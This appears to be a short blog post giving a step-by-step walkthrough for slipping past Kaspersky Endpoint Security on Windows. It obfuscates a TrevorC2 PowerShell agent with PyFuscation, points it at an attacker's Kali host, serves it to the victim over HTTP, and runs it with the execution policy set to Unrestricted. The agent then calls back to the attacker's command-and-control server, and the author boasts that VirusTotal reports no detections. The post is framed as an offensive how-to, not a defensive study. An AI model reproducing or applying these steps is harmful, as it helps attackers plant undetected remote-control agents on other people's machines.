Bypass Kaspersky Endpoint Security for Windows with TrevorC2 + Pyfuscation

Joas Antonio
3 min readMar 4, 2021

--

Let’s download Trevorc2 and Pyfuscation

Git clone https://github.com/trustedsec/trevorc2

Git clone https://github.com/CBHue/PyFuscation

After downloading Trevorc2 and Pyfuscation using the git clone, copy the file trevor_client.ps1, and throw it into the Pyfuscation folder

Change the IP address of SITE_URL to the IP of your Kali machine and save

Let’s obfuscate our powershell with pyfuscation

If all goes well it will generate this output, where the folder with obfuscated code is located

After that just access the folder and rename the file.ps1

We are going to open an HTTP server with python using http.server and now we are going to download ps1 on the victim’s machine

Realize that Kaspersky is operating and active

Now I will open Powershell in Admin

Now I’m going to access Firefox, type your Kali’s IP address on port 8000 to download the malicious powershell

Notice that it is in the downloads folder

Now let’s run the trevorc2 server: python3 trevorc2_server.py

let’s run the malicious powershell

This error means that our powershell has a policy of not executing any type of script

Let’s type the following command to release Set-ExecutionPolicy Unrestricted

Now let’s run the script, it says it is not a reliable script

See that the agent has now communicated with our C2, so Kaspersky did not detect the threat

View machine information

Note that we bypass Kaspersky Endpoint Security for Windows with ease

This is the result of Hybrid-Analysis and Virus Total, no detection.
Of course I uploaded it on purpose on the virus total.

--

--